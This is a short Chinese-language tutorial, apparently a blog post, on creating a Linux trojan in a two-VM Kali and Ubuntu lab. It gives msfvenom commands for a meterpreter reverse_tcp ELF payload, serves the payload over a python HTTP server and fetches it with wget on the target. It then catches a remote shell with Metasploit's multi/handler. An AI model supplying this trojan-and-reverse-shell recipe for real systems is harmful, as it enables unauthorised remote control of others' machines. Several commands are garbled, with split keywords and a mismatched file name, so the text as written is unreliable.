kali编写木马,kalilinux渗透教程
环境:ubuntun kali2020.4
这个实验需要两台虚拟机kali和ubuntun。
注:kali的地址是192.168.147.137 ubuntun的地址是192.168.147.129。
我使用ssh链接。
Ssh链接到ubuntun并输入root权限。
链接kali
在kali下的root权限下生成有效负载(即特洛伊木马)
MSF venom-p Linux/x86/meter preter/reverse _ tcplhost=192 . 168 . 147 . 137 lport=4444-felf shell . elf,然后点击shell。
注:192.168.147.137的端口是kali地址4444。
用python在kali中制图
python3 -m http.server 80
用ubuntun下载wget http://192.168.147.137/shelf
在kali下的MSF控制台下,使用exploit/multi/handler命令,然后使用选项显示参数。
使用set添加参数
使用的集合的有效负载:Linux/x86/meter preter/reverse _ tcplhost=192 . 168 . 147 . 137
如果在msf中运行run run,在ubuntun中运行shell.elf,可以看到如果没有足够的权限用chmod提升权限,连接是成功的。
然后就可以执行命令了。如果权限不足,请使用shell,然后使用exit退出。